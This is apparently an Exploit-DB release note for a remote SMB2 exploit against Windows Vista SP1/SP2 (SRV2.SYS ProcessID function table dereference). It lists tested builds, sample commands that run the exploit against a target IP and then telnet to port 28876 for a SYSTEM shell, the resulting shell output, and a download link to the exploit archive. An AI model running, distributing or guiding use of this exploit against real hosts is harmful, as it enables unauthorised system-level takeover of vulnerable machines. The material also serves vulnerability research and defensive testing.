Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
---------------------------------------------------------------------

Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!

Tested on:
Vista sp2 (6.0.6002.18005)
Vista sp1 ultimate (6.0.6001.18000)

Kudos for:
Stephen, HDM, Laurent Gaffie (bug) and all the mates I know, peace.
Special kudos for prdelka for testing this shit and all the hosters.


Sample usage
------------

> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>

When all is done it should spawn a listener on TARGET_IP:28876 (the telnet session above connects to that port and gets a SYSTEM shell).


RELEASE UPDATE 08/2010:
----------------------
This exploit was created almost a year ago and wasn't modified from that time
whatsoever. The vulnerability itself is patched for a long time already so
I have decided to release this little exploit. You use it on your own
responsibility and I'm not responsible for any potential damage this thing
can cause. Finally I don't care whether it worked for you or not.

P.S. the technique itself is described here:
http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html

===========================================================================
Download:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14674.zip (smb2_exploit_release.zip)